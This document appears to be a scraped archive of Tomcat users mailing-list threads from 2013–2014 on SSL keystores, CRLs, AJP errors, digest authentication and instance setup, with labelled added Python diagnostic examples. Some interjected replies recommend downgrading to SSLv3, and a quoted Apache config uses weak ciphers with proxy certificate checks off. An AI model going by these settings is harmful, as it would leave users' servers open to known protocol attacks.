root@ubuntu:/home/san/certs/pay-test# openssl s_client -connect 127.0.0.1:8443 -tls1_2 -debug
CONNECTED(0003)
write to 0x8a03258 [0x8a0cfe3] (319 bytes = 319 (0x13F))
read from 0x8a03258 [0x8a08a93] (5 bytes = 5 (0x5))
- 15 03 03 00 02 .
read from 0x8a03258 [0x8a08a98] (2 bytes = 2 (0x2))
- 02 28 .(
3074095420:error:14094410:SSL
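The two reads at the end of the s_client output above (5 bytes, then 2 bytes) are one TLS alert record: a record header followed by the alert level and description. The following is an added example, not part of the original post, that decodes such records; the byte values are copied from that output, and the function and table names are illustrative.

```python
"""Decode plaintext TLS alert records from raw bytes (added example)."""
from typing import Iterator, List, NamedTuple, Tuple

CONTENT_TYPE_ALERT = 21  # 0x15 in the first byte of the record header

VERSIONS = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}
ALERT_LEVELS = {1: "warning", 2: "fatal"}
# Alert descriptions from RFC 5246, section 7.2.
ALERT_DESCRIPTIONS = {
    0: "close_notify", 10: "unexpected_message", 20: "bad_record_mac",
    22: "record_overflow", 30: "decompression_failure", 40: "handshake_failure",
    42: "bad_certificate", 43: "unsupported_certificate", 44: "certificate_revoked",
    45: "certificate_expired", 46: "certificate_unknown", 47: "illegal_parameter",
    48: "unknown_ca", 49: "access_denied", 50: "decode_error", 51: "decrypt_error",
    70: "protocol_version", 71: "insufficient_security", 80: "internal_error",
    90: "user_canceled", 100: "no_renegotiation", 110: "unsupported_extension",
}


class Record(NamedTuple):
    content_type: int
    version: Tuple[int, int]
    fragment: bytes


def iter_records(data: bytes) -> Iterator[Record]:
    """Split a byte stream into TLS records (5-byte header plus fragment)."""
    offset = 0
    while offset < len(data):
        header = data[offset:offset + 5]
        if len(header) < 5:
            raise ValueError("truncated record header at offset %d" % offset)
        length = int.from_bytes(header[3:5], "big")
        end = offset + 5 + length
        if end > len(data):
            raise ValueError("record at offset %d claims %d bytes, stream is shorter"
                             % (offset, length))
        yield Record(header[0], (header[1], header[2]), data[offset + 5:end])
        offset = end


def describe_alerts(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (protocol version, level, description) for every alert record."""
    alerts = []
    for record in iter_records(data):
        if record.content_type != CONTENT_TYPE_ALERT:
            continue
        version = VERSIONS.get(record.version, "unknown %d.%d" % record.version)
        if len(record.fragment) != 2:
            # Alerts sent after the handshake are encrypted and cannot be read here.
            alerts.append((version, "encrypted",
                           "%d-byte protected alert" % len(record.fragment)))
            continue
        level, description = record.fragment
        alerts.append((version,
                       ALERT_LEVELS.get(level, "level %d" % level),
                       ALERT_DESCRIPTIONS.get(description, "alert %d" % description)))
    return alerts


# The two reads from the s_client -debug output in the post: header, then body.
SERVER_REPLY = bytes.fromhex("15 03 03 00 02") + bytes.fromhex("02 28")

if __name__ == "__main__":
    for version, level, description in describe_alerts(SERVER_REPLY):
        print("%s alert: %s %s" % (version, level, description))
```

RFC 5246 defines handshake_failure as the sender being unable to negotiate an acceptable set of security parameters, so the next things to compare are the protocol versions and cipher suites enabled on each side.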
RE: Problem configuring SSL
Date: Tue, 7 Jan 2014 14:41:15 -0500
Subject: Re: Problem configuring SSL
From: a-ko...@northwestern.edu
To: users@tomcat.apache.org

Gentlemen, thanks a lot for your help. I figured out what the problem was. It was not related to tomcat configuration, but to my keystore. The reason is that once you import a client certificate under the same alias as the private pair, they both get merged under the same alias inside keystore. Using keytool -delete command, meant to remove the certificate only, deletes the private pair as well. I noticed that once I dumped keystore content for my keystore and a keystore on one of my other servers. Luckily, I had a backup of the keystore I made right after it was created. Importing the certificates into that keystore resolved the issue.

MG> I *hope* you enabled at least ONE cipher for SSL Connector
MG> Usually the big players (Verisign/Thawte) will provide valid CA cert/valid key in the supplied pfx
MG> glad to hear that worked for you

On Sun, Jan 5, 2014 at 3:59 PM, Christopher Schultz ch...@christopherschultz.net wrote:

Alex,

On 1/5/14, 12:30 PM, Alex Kogan wrote:

I have a strange problem configuring SSL to work with Tomcat.

Environment:
Tomcat 7.0.42
CentOS 5.10
Java 1.7.0_45

It's a new Tomcat installation. All keystore operations were done with keytool. I imported CA root/intermediate certificate and client certificate, configured SSL connector in server.xml. I have this same setup on another server that works fine. Connecting to this server via http works.

1. If I try to connect this address via https in Chrome I get: This Webpage is not available. In Firefox: Error code: ssl_error_no_cypher_overlap

Sounds familiar.

Please post your Connector configuration(s) from your server.xml file. Remember to remove any sensitive information from the configuration.

Also please post all of the startup messages from Tomcat's logs/catalina.out file: we need to see the versions of various things and what components (if any) suffer problems starting up.

3. Here's a list of enabled ciphers using SSLInfo: #java -showversion SSLInfo

Nice to see someone is getting some use out of that. ;)

-chris

- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org

--
Software Engineer
Department of Psychiatry and Behavioral Sciences
Northwestern University
a-ko...@northwestern.edu
RE: expired crl file
Date: Sat, 4 Jan 2014 09:18:22 +0100
Subject: expired crl file
From: jjaku...@gmail.com
To: users@tomcat.apache.org

When I place an expired CRL file, Tomcat starts without any visible stack trace in the logs, but I cannot log in with valid certificates.

MG> $CATALINA_HOME/conf/setenv.sh
MG> # Uncomment the next line to print SSL debug trace in catalina.out
MG> #CATALINA_OPTS="$CATALINA_OPTS -Djavax.net.debug=ssl"

Is there any solution for this feature? BTW, how can I check the validity/expiration date of a CRL file?

Regards
Jakub

MG> Good luck
MG> Martin
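On the question above of how to check a CRL's validity dates: `openssl crl -in <file> -noout -lastupdate -nextupdate` prints them, and the added example below (not part of the original thread) classifies a CRL from that output so it can run as a scheduled check. The sample output, the function names and the 7-day warning threshold are constructed for illustration.

```python
"""Classify a CRL by its validity window, using openssl's date output (added example)."""
import subprocess
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional


def read_crl_dates(path: str, inform: str = "PEM") -> str:
    """Run openssl on a CRL file and return its lastUpdate/nextUpdate lines."""
    result = subprocess.run(
        ["openssl", "crl", "-in", path, "-inform", inform,
         "-noout", "-lastupdate", "-nextupdate"],
        capture_output=True, text=True, check=True)
    return result.stdout


def parse_crl_dates(openssl_output: str) -> Dict[str, Optional[datetime]]:
    """Parse 'lastUpdate=' / 'nextUpdate=' lines into UTC datetimes."""
    dates: Dict[str, Optional[datetime]] = {"lastUpdate": None, "nextUpdate": None}
    for line in openssl_output.splitlines():
        key, sep, value = line.strip().partition("=")
        # openssl prints nextUpdate=NONE when the optional field is absent.
        if not sep or key not in dates or value == "NONE":
            continue
        parsed = datetime.strptime(value, "%b %d %H:%M:%S %Y GMT")
        dates[key] = parsed.replace(tzinfo=timezone.utc)
    return dates


def crl_status(openssl_output: str, now: Optional[datetime] = None,
               warn_days: int = 7) -> str:
    """Return one of: not yet valid, no nextUpdate, expired, expiring soon, valid."""
    now = now or datetime.now(timezone.utc)
    dates = parse_crl_dates(openssl_output)
    last, nxt = dates["lastUpdate"], dates["nextUpdate"]
    if last is None:
        raise ValueError("no lastUpdate line found; is this openssl crl output?")
    if now < last:
        return "not yet valid"
    if nxt is None:
        return "no nextUpdate"
    if now >= nxt:
        return "expired"
    if nxt - now <= timedelta(days=warn_days):
        return "expiring soon"
    return "valid"


# Constructed sample of the openssl output; not taken from a real CRL.
SAMPLE_OUTPUT = (
    "lastUpdate=Dec  1 00:00:00 2013 GMT\n"
    "nextUpdate=Jan  1 00:00:00 2014 GMT\n"
)

if __name__ == "__main__":
    check_time = datetime(2014, 1, 4, 9, 18, 22, tzinfo=timezone.utc)
    print(crl_status(SAMPLE_OUTPUT, now=check_time))
```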
RE: Symantec SSL cert in tomcat 6
MG> Ognjen

Gene,

On 3.1.2014 14:55, Gene Matthews wrote:

The Symantec instructions say to ensure the alias for the ssl cert has an Entry Type of PrivateKeyEntry. Mine DOES NOT. Instructions say if it does not, to please import the certificate in the “Private Key” alias.

With JKS keystore you must keep private key and certificates in the same keystore.

MG> Since a pfx that Verisign provides contains key and cert
MG> Windows servers use .pfx files to contain the public key files (your SSL Certificate files, provided by DigiCert) and
MG> the associated private key file (generated by your server as part of the CSR).
MG> perhaps you are referring to the key/certificate combination in pfx?

Therefore, you shouldn't import server certificate and inter. certificates into brand new keystore, but into the old keystore -- the one you used to create key pair, and to generate CSR.

MG> CSR is the request to CA Authority (verisign) to sign (digitally identify) this certificate
MG> certificate signing request (also CSR or certification request) is a message sent from an applicant to a
MG> certificate authority in order to apply for a digital identity certificate. The most common format for CSRs is the
MG> PKCS#10 specification

I find it strange that Symantec/Verisign didn't mention that explicitly in their documentation.

MG> agreed

It also says to ensure the Certificate chain length is 4.

Once you import certificates into the right keystore, check that again.

PS: How does one search the archives of this list? When I browse the archive site I don’t see a search field anywhere. So I’ve been googling without coming up with a solution. it is probably out there but I don’t know enough to recognize it :-(

http://tomcat.apache.org/lists.html
Search for Archives.

-Ognjen

- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
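Both keystore threads above (the "Problem configuring SSL" keystore whose private key disappeared with keytool -delete, and this alias that is not a PrivateKeyEntry) come down to what `keytool -list -v -keystore <file>` reports for the server alias. The following is an added example, not code from either thread, that audits that listing; the alias names and the sample listings are constructed, and the expected chain length of 4 is the value quoted from the Symantec instructions.

```python
"""Audit `keytool -list -v` output for the TLS server alias (added example)."""
import re
from typing import Dict, List, Optional

ALIAS_RE = re.compile(r"^Alias name:\s*(.+)$")
TYPE_RE = re.compile(r"^Entry type:\s*(\S+)$")
CHAIN_RE = re.compile(r"^Certificate chain length:\s*(\d+)$")


def parse_listing(text: str) -> List[Dict]:
    """Collect alias, entry type and chain length for every keystore entry."""
    entries: List[Dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        match = ALIAS_RE.match(line)
        if match:
            entries.append({"alias": match.group(1), "type": None, "chain_length": 0})
            continue
        if not entries:
            continue  # header lines before the first entry
        match = TYPE_RE.match(line)
        if match:
            entries[-1]["type"] = match.group(1)
            continue
        match = CHAIN_RE.match(line)
        if match:
            entries[-1]["chain_length"] = int(match.group(1))
    return entries


def audit_server_alias(text: str, alias: str,
                       expected_chain_length: Optional[int] = None) -> List[str]:
    """Return findings for the alias the SSL connector is meant to use."""
    entries = parse_listing(text)
    findings = []
    entry = next((e for e in entries if e["alias"].lower() == alias.lower()), None)
    if entry is None:
        findings.append("alias '%s' not found in keystore" % alias)
    elif entry["type"] != "PrivateKeyEntry":
        findings.append("alias '%s' is a %s: no private key is stored under it"
                        % (alias, entry["type"]))
    elif expected_chain_length is not None:
        if entry["chain_length"] != expected_chain_length:
            findings.append("alias '%s' has chain length %d, expected %d"
                            % (alias, entry["chain_length"], expected_chain_length))
    elif entry["chain_length"] <= 1:
        findings.append("alias '%s' has chain length %d: typically only the "
                        "certificate generated with the key pair is present"
                        % (alias, entry["chain_length"]))
    if not any(e["type"] == "PrivateKeyEntry" for e in entries):
        findings.append("keystore holds no PrivateKeyEntry at all")
    return findings


# Constructed listings in keytool's -list -v layout (certificate details omitted).
BROKEN_LISTING = """Keystore type: JKS
Keystore provider: SUN

Your keystore contains 2 entries

Alias name: root
Creation date: Jan 3, 2014
Entry type: trustedCertEntry

Alias name: tomcat
Creation date: Jan 3, 2014
Entry type: trustedCertEntry
"""

GOOD_LISTING = """Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

Alias name: tomcat
Creation date: Jan 3, 2014
Entry type: PrivateKeyEntry
Certificate chain length: 4
Certificate[1]:
"""

if __name__ == "__main__":
    for finding in audit_server_alias(BROKEN_LISTING, "tomcat", 4):
        print(finding)
```

Running the same audit against the keystore backup before deleting or re-importing anything shows whether the private key is still present under the alias.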
RE: Java to JavaScript RMI framework available.
Johan-

If your design supports Comet, Polling or Piggyback you *may* want to take a look at Joe Walker's DWR..(Direct Web Remoting)
http://directwebremoting.org/dwr/index.html

*Kind regards*
Martin
--

Date: Thu, 2 Jan 2014 15:54:01 -0800
Subject: Re: Java to JavaScript RMI framework available.
From: igor.uris...@gmail.com
To: users@tomcat.apache.org

Johan,

On Thu, Jan 2, 2014 at 1:25 AM, Johan Compagner jcompag...@servoy.com wrote:

does it also do the other way around? So also having the endpoint on the server that has methods that can be called from javascript in a very easy way?

It doesn't. There is already a mechanism that sits above simple message passing, for calling into the server: XMLHttpRequest, aka AJAX. Competing with that would have taken more thought and effort than so far I have been able to put into FERMI. I imagine that if this gets some acceptance, offering a fully symmetric RMI may become a viable idea. Not on the immediate roadmap, though.

-Igor.

On 31 December 2013 01:55, Igor Urisman igor.uris...@gmail.com wrote:

Folks,

I needed to write this for something I am working on and thought there might be a wider audience for it. Tomcat 8 supports standard compliant Websockets, which provide convenient asynchronous full-duplex server to client data transport. The framework I am offering builds on top of that a feature rich remote method invocation paradigm. Please check it out.

https://github.com/iurisman/FERMI

Apache 2.0 license. Happy coding.

Igor.

--
Johan Compagner
Servoy
RE: Start the Tomcat server in the server view and go to http://localhost:8080/
Frank

Context Path / is mapped to 'ROOT'
create ROOT.WAR
uncompress ROOT.WAR to $CATALINA_HOME/webapps/ROOT
then the first and only webapp you see when you go to http://localhost:8080 will be root.war

http://www.coderanch.com/t/424290/Tomcat/deploy-Root-Tomcat-Website

Good luck!
Martin
--
Please do not modify or interrupt this transmission

From: frank.luga...@amdocs.com
To: users@tomcat.apache.org
Subject: Start the Tomcat server in the server view and go to http://localhost:8080/
Date: Fri, 27 Dec 2013 19:51:26 +

Hi All,

I have a very simple question but it seems I can't find this option. I tried to google several times! Can someone please tell me how to Start the Tomcat server in the server view and go to http://localhost:8080/?

Thank you
~Frank

This message and the information contained herein is proprietary and confidential and subject to the Amdocs policy statement, you may review at http://www.amdocs.com/email_disclaimer.asp
RE: V 7 047 windows x64
Date: Thu, 26 Dec 2013 21:24:27 +0100
Subject: Re: V 7 047 windows x64
From: jbmo...@gmail.com
To: users@tomcat.apache.org

I was testing the EL in a .jsp file under Eclipse Kepler. Now I copied the project files under c:\tomcat7\webapps and recompiled the java sources. And the EL works! So the EL problems are in the Eclipse Kepler setup.

MG> then you should contact the support staff at Eclipse to let them know of this significant bug in Kepler

Many thanks for your reply.
Jean

On Thu, Dec 26, 2013 at 3:16 PM, André Warnier a...@ice-sa.com wrote:

JB MORLA wrote:

Hi, I can't use EL in .jsp files. I have searched the web and installed jasper-el.jar and javaee-api 7 0 in the \lib directory, but I keep getting the ELResolver error.

Hi.
You would have a much higher probability of getting useful and quick help, if you pasted the original corresponding Tomcat error log lines in your message, like here :
(Note: really do a cut-and-paste directly in your mail message to the list. Do not attach the error log as attachment. This list strips most attachments).
RE: EOFException in AjpNioProcessor
Subject: Re: EOFException in AjpNioProcessor
From: jsb_tom...@360works.com
Date: Sat, 21 Dec 2013 16:58:07 -0500
To: users@tomcat.apache.org

On Dec 18, 2013, at 1:40 PM, André Warnier a...@ice-sa.com wrote:

Jesse Barnum wrote:

On Dec 18, 2013, at 12:27 PM, Jesse Barnum jsb_tom...@360works.com wrote:

I'm seeing this error a lot in my log files. It happens when I am trying to read from the request InputStream. Should I be concerned about this, or is it just the equivalent of the user clicking 'stop' in their browser?

SEVERE: An error occurred while handling request /WSMRegister/LicenseCheck/handshake
java.io.EOFException

Forgot to mention, I'm running version 7.0.35 on Ubuntu Linux on Amazon EC2.

Well, it seems that you have the explanation right there. If com.prosc.licensecheck.LicenseCheck.doPost is your code, then that's where the problem is : you are trying to read from the request input stream, when there is no more data to read and you have already seen its EOF. Why there is no more data to read is another question, and it could be that the client did something wrong. But the code in those classes who do the read, obviously is not coping well with that case.

Yes, com.prosc.licensecheck.ListCheck.doPost is my code. It would not be hard to catch the exception there and ignore it. I guess another way to phrase the question is, what would cause a java.io.EOFException to get thrown? I don't want to ignore it if it's trying to tell me something important. I am used to seeing ClientAbortException: java.net.SocketException: Broken pipe.

MG> Error in Transport..your apache or tomcat servers (or one of intervening routers) is unable to complete the transmission

Is the EOFException basically the same thing?

MG> As Andre said, there is no more data from Request

My concern is that there might be some misconfiguration between the Apache front end and the Tomcat NIO connector that might be causing it.

MG> ..possibly...let's take a look..
RE: Exception in CoyoteAdapter class
Mr. AT

Martín> The port and the protocol have to agree with the AJP connector configuration in Tomcat's server.xml
Martín> The port should be 8009
Martín> Enable the TLS protocol (but not SSLv2)
http://www.zeitoun.net/articles/configure-mod_proxy_ajp-with-tomcat/start
Martín> Kind regards from Dorchester, MA

From: at.s...@everis.com
To: users@tomcat.apache.org
Subject: RE: Exception in CoyoteAdapter class
Date: Fri, 20 Dec 2013 08:30:19 +

Hi,

We are concerned about the issues we found some weeks ago, do you have any suggestions about it?

Best Regards,
AT

-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Monday, December 9, 2013 22:51
To: Tomcat Users List
Subject: Re: Exception in CoyoteAdapter class

AT,

On 12/9/13, 6:43 AM, at.silk wrote:

2. What is in front of Tomcat? An Apache HTTPD server? - Right.
Is Apache HTTPD accessed via HTTPS? - Right, via HTTPS
How mod_jk is configured there? Is mod_jk configured to pass SSL_SESSION_ID to Tomcat?

AT: This is our configuration:

AllowCONNECT 443
SSLEngine on
SSLProxyEngine on
SSLProxyVerify none
SSLOptions +StdEnvVars +ExportCertData
SSLProtocol all -SSLv2
SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW
SSLCertificateFile xxx.crt
SSLCertificateKeyFile xxx.key
ProxyPass / ajp://localhost:8010/ connectiontimeout=3600 timeout=3600
ProxyPassReverse / ajp://localhost:8010/

Just a note: this is a mod_proxy_ajp configuration, not a mod_jk one.

I know that mod_jk uses SSLOptions +StdEnvVars to pass the SSL session id to Tomcat, but I'm sorry, I don't know about mod_proxy_ajp. I can imagine that it would operate in a similar way, but the mod_proxy_ajp documentation isn't as forthcoming as the mod_jk documentation.

-chris
RE: ssl_error_internal_error_alert in tomcat 7
Date: Thu, 19 Dec 2013 15:41:13 -0500
From: ch...@christopherschultz.net
To: users@tomcat.apache.org
Subject: Re: ssl_error_internal_error_alert in tomcat 7

Jaya,

On 12/19/13, 2:54 PM, jaya ravindran wrote:

I am getting SSL error in firefox when connecting to tomcat server.
Apache Tomcat Version 7.0.22 using JSSE configuration

You should really upgrade from your 2-year-old version. Tomcat 7 is on version 7.0.47 these days. It's possible something has been fixed.

java version 1.6.0_41 using 64 bit.
IE and Chrome work fine, although I can see the following message in Chrome: The connection uses SSL 3.0
When I edit firefox and set security.tls.version.max=0, I can get connection. My ssl config is below.

MG> security.tls.version.min = 0 (SSL 3.0);

Do you have any non-default setting for security.enable_ssl3 or security.enable_tls?

Can anyone suggest some possible reasons for this error?

<Connector port="8443"
    protocol="org.apache.coyote.http11.Http11Protocol"
    SSLEnabled="true"
    scheme="https"
    secure="true"
    clientAuth="false"
    sslProtocol="TLS"
    keystoreFile="my.keystore"
MG> sslProtocol=SSLv3
    keystorePass="acdfv123"
    truststoreFile="my.keystore"
    truststorePass="acdfv123"
    connectionTimeout="2"
    redirectPort="18443"
    maxThreads="150"
    maxSpareThreads="75"
    enableLookups="false"
    acceptCount="100"
    disableUploadTimeout="true"
    URIEncoding="UTF-8"
    server="Apache" />

Can you try using OpenSSL's s_client with various options (for TLS protocol) to see which ones do and do not work?

-chris

MG> https://support.mozilla.org/en-US/questions/963325
RE: linking (limiting???)
Date: Sun, 15 Dec 2013 12:41:55 -0800
From: its_toas...@yahoo.com
To: users@tomcat.apache.org
Subject: Re: linking (limiting???)

On 12/15/2013 8:34 AM, Ray Holme wrote:

I am a Linux user and love linking things to reduce copies. Apache/Tomcat (by default) does not allow symbolic linking (nice as it can cross mounted file systems) except in the top apache/lib directory. I use hard links in the Application/WEB-INF/lib directories to reduce copying and help me manage things.

HOWEVER, some applications have special needs - e.g. pictures. You don't want to always distribute these with the release of the application (Application.war file), so symbolic links are the way to go (except for MS land, sorry).

The nice solution to this is: .../webapps/Application/WEB-INF/context.xml which must contain at least the two below lines:

<?xml version="1.0" encoding="UTF-8"?>
<Context allowLinking="true"> </Context>

However this allows ALL symbolic linking in the Application directory. I agree with the developers that this is dangerous.

Is there some way to allow linking in just ONE sub-directory of the Application?? - e.g. .../webapps/Application/images

This would allow all I need to have local images for the application without endangering other things using a symbolic link.

If you use Tomcat 7, read the following:

http://tomcat.apache.org/tomcat-7.0-doc/config/context.html#Resource_Definitions

MG> ...Mark I assume you're referring to Virtual DirContext...?
MG> <Context path="/mywebapp" docBase="/Users/theuser/mywebapp/src/main/webapp">
MG>   <Resources className="org.apache.naming.resources.VirtualDirContext"
MG>       extraResourcePaths="/WEB-INF/classes=/Users/theuser/mywebapp/target/classes,/pictures=/Users/theuser/mypictures,/movies=/Users/theuser/mymovies" />

. . . just my two cents
/mde/

MG> Thanks Mark,
RE: Transfer-Encoding: chunked not working
chunked only works on HTTP 1.1 connections
display $CATALINA_HOME/conf/server.xml

Martin
--

Date: Tue, 3 Dec 2013 15:55:22 -0800
Subject: Transfer-Encoding: chunked not working
From: cbman...@gmail.com
To: users@tomcat.apache.org

Tomcat 7.0.47, OSX 10.8. Fresh install via homebrew.

I'm running a web app with Tomcat that is returning the header Transfer-Encoding: chunked and seemingly exactly one 16384-byte chunk of content that is longer than that. Consequently the page that should be transferred is not rendered by the user agent (Chrome in this case). AFAICT it's Tomcat that isn't sending all the chunks properly. Why might it not be doing that? What else might be the problem?

--
C. Benson Manica
cbman...@gmail.com
RE: Same realm for three different countries
$CATALINA_HOME/src> grep -S -l locale *Realm*.*
---Nothing---

I'm going to agree with Chris. 2 options:
1) Make an 'Enhancement Request' to introduce localisation parameter for JDBCRealm
2) code the localisation parameter into CustomRealm yourself and submit a patch

http://tomcat.apache.org/bugreport.html#How_to_submit_patches_and_enhancement_requests

Good luck!
Martin
__
Disclaimer and confidentiality note
This message is confidential. If you are not the intended recipient, we kindly ask that you notify us. Any unauthorized forwarding or copying is prohibited. This message serves only for the exchange of information and has no legally binding effect. Because e-mails can easily be manipulated, we cannot accept any liability for the content.

Date: Mon, 2 Dec 2013 23:40:59 +0100
Subject: Re: Same realm for three different countries
From: stefan.a.f...@gmail.com
To: users@tomcat.apache.org

Do you see an entry point where to start? I already have a customRealm.

2013/12/2 Christopher Schultz ch...@christopherschultz.net:

Stefani,

On 12/2/13, 2:23 PM, Stefan Frei wrote:

tomcat 7.0.42 debian

I have the same web application responsible for providing services for three different countries. Therefore 3 slightly different database schemas exist on my mysql instance: one for ch (switzerland), one for de (germany) and one for at (austria).

Now my auth-realm which extends RealmBase should be able to decide which schema to connect to, depending on the requested url. For example requests to webapp.ch should use the table users in schema ch.

How am I able to read out httprequest or session in the realm to identify for which country the request is destined?

The short answer is that you can't, at least with Tomcat's stock Realm implementations.

You can hack your own Realm, but you'll also need to hack around a bit more, since the Realm itself doesn't get any access to the servlet request information.

-chris
RE: multiple servers and digest authentication
From: cdeha...@ebay.com
To: users@tomcat.apache.org
CC: cdeha...@ebay.com
Subject: Re: multiple servers and digest authentication
Date: Sat, 30 Nov 2013 01:55:32 +

Hi,

Thanks for your answers:

1/ Sticky session: yes, that is the way I have currently set my load balancer. But there is a drawback when the client is continuously using the service => because it will never be load balanced again. The worst is when one of the servers is stopped and restarted => all the clients will be redistributed to the still alive servers, and when the server is restarted, it will not pick up any load.

To work around this problem, with sticky session on, I have patched my client to clear the sticky cookie every X minutes. That forces the load balancer to give me the less used servers (possibly the one that has been restarted).

2/ front-end load balancer solution: my configuration is with an F5 load balancer (citrix). From what I understand, the question is: can we configure the F5 to manage the nonce and then delegate the authentication to the servers (tomcat)- .

It will require:
F5 to manage the nonce (will send back the 401 when nonce not valid) but

MG> here is the XSD element definition for nonce using wss4j
MG> xmlns:xenc="http://www.w3.org/2001/04/xmlenc#"
MG> <!-- KANonce -->
MG> <ObjectProvider qualifiedName="xenc:KA-Nonce">
MG>   <BuilderClass className="org.opensaml.xml.encryption.impl.KANonceBuilder" />
MG>   <MarshallingClass className="org.opensaml.xml.schema.impl.XSBase64BinaryMarshaller" />
MG>   <UnmarshallingClass className="org.opensaml.xml.schema.impl.XSBase64BinaryUnmarshaller" />
MG> </ObjectProvider>
MG> so how would F5 build out a nonce such as
MG> <EncryptedData>
MG>   <EncryptionMethod Algorithm="Example:Block/Alg">
MG>     <KeySize>80</KeySize>
MG>   </EncryptionMethod>
MG>   <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
MG>     <AgreementMethod Algorithm="example:Agreement/Algorithm">
MG>       <KA-Nonce>Zm9v</KA-Nonce>
MG>       <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha1"/>
MG>       <OriginatorKeyInfo> <ds:KeyValue></ds:KeyValue> </OriginatorKeyInfo>
MG>       <RecipientKeyInfo> <ds:KeyValue></ds:KeyValue> </RecipientKeyInfo>
MG>     </AgreementMethod>
MG>   </ds:KeyInfo>
MG>   <CipherData>...</CipherData>
MG> ?

not verify the user credential and pass that to servers
Servers (tomcat) to not check the nonce but check the credential.

I have read the description of tomcatAuthentication flag from André's link, but I'm not sure it does what I expect.

Any idea if this is feasible from F5/tomcat point of view? Any other suggestions? ;)

Thanks,
Xtof

On 11/27/13 9:04 AM, Christopher Schultz ch...@christopherschultz.net wrote:

André,

On 11/27/13, 5:15 AM, André Warnier wrote:

Mark Thomas wrote:

On 27/11/2013 07:34, Dehaudt, Christophe wrote:

Is there a way to share the nonce between servers so they can act as one?

No. You'd need to customise the DigestAuthenticator to do that.

I would like to get your advice on how to make a multiple server deployment running with Http digest.

Use sticky load-balancing.

Or do the authentication at the front-end load-balancer level, and set Tomcat's authentication to accept what the front-end says ? (E.g. https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html#Standard_Implementations #tomcatAuthentication)

While it is popular to do so, I don't think anyone really uses httpd for industrial-strength load-balancing. Can an F5 do authentication (and forward it to Tomcat?). I suspect not in any way that would work well with the back-end application.
RE: Patch information required
I will contact all the engineers I know who want to work free for Accenture

Goodbye

From: kanishk.se...@accenture.com
To: users@tomcat.apache.org
CC: pravin.pa...@accenture.com
Subject: Patch information required
Date: Thu, 28 Nov 2013 06:15:27 +

Hi All,

We are using Apache Tomcat version 6.0.26 and we need to install the patches below on our servers to fix some vulnerabilities.

http://svn.apache.org/viewvc?view=revision&revision=958911
http://svn.apache.org/viewvc?view=revision&revision=958977
http://svn.apache.org/viewvc?view=revision&revision=959428
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03298151
http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2012-05-584&actionBtn=Search

I am not sure how to install these patches. Can anyone help us here?

Regards
Kanishk Sethi

This message is for the designated recipient only and may contain privileged, proprietary, or otherwise confidential information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the e-mail by you is prohibited. Where allowed by local law, electronic communications with Accenture and its affiliates, including e-mail and instant messaging (including content), may be scanned by our systems for the purposes of information security and assessment of internal compliance with Accenture policy.
__
www.accenture.com
Felix plugin for Tomcat?
All-

Is/are there any efforts to integrate Apache Felix OSGI Console Functions (as a TC plugin) into either Tomcat 7.x or Tomcat 8.x?

http://felix.apache.org/

Thanks,
Martin
RE: PersistentManager + JdbcStore
..Perhaps..
http://kickjava.com/src/com/lutris/appserver/server/sessionContainerAdapter/JmxContainerAdapterSessionManager.java.htm
(Install as a JMX agent)

Kind regards
Martin
__
Please do not alter or interrupt this communication. Thank you

Date: Sat, 9 Nov 2013 16:07:42 -0300
Subject: Re: PersistentManager + JdbcStore
From: jbig1...@gmail.com
To: users@tomcat.apache.org

Thanks for this post, but the problem that I have is uncertain. My application is Java Web and creates a session for the user in Tomcat (version apache-tomcat-7.0.29) and an unusual one user captures the user session without finding an explanation. Could you help me or tell me who to contact to find out how Tomcat creates and validates sessions created and if possible capture the session of another user from different computers.

Best Regards

2013/11/9 spr...@gmx.eu

I think I will fix the DynamoDB-Sessionmanager. Also an option.

Already in process it seems ;)
https://github.com/aws/aws-dynamodb-session-tomcat/issues/3

I hope they will use the code from tomcat for managing the classloader issues.

Well, just realized that this Manager is based on PersistentManagerBase. So I see no improvement in terms of reliability, because it still writes the data async into DynamoDB. I even cannot see the reason why they created DynamoDBSessionManager, DynamoDBSessionStore would have done the job too then.

Looking into the Manager interface (public void backgroundProcess()) tells me, that it seems to be always async?

So what is the right strategy to distribute sessions across an arbitrary amount of servers with a 100% guarantee that the session will be found at any time on any server?

Thank you
RE: Bin Folders
to hammer home what Jordan is saying: sh/cmd/bat files are usually based on environment variables e.g. CATALINA_BASE to the exact location of the specific TOMCAT Instance you are running CATALINA_HOME to the exact location of the folder where TOMCAT was installed assuming you have set unique service_name for each service http://grokbase.com/t/tomcat/users/1351gyqtgb/multiple-tomcat-containers-or-instance-on-same-servers if memory serves there is a SC query TomcatServiceName which should display details for each TOMCAT service services.msc at run command provides the same info If CATALINA_BASE changes you will need to uninstall and reinstall to make sure the registry has a clean configuration for the TC instance I'll defer to Jordan, Dave and others to guide you thru that process.. Date: Wed, 6 Nov 2013 10:39:13 -0800 From: jor...@viviotech.net To: users@tomcat.apache.org Subject: Re: Bin Folders Have you made changes that you want to keep? In my experience the installer script and exe's are fairly well removed from the other files in the bin folder. Unless you've made specific changes to files that you want to keep, I don't see the point of what you're doing. If you *have* made changes, why not just copy the files you've changed and leave it at that? Make life easier on yourself. ;) Warm Regards, Jordan Michaels On 11/06/2013 10:29 AM, Crystal Maramba wrote: I will as soon as I combine the bin folders. The service installer does not include the scripts which is what I need from the first install. Would you know if there will be any issues with the rest of the folders? -Original Message- From: Jordan Michaels [mailto:jor...@viviotech.net] Sent: Wednesday, November 06, 2013 10:25 AM To: Tomcat Users List Subject: Re: Bin Folders From my experience, no; there should not be an issue with that. Why not just get rid of the first install if you're not going to use it? Keep your system clean and less 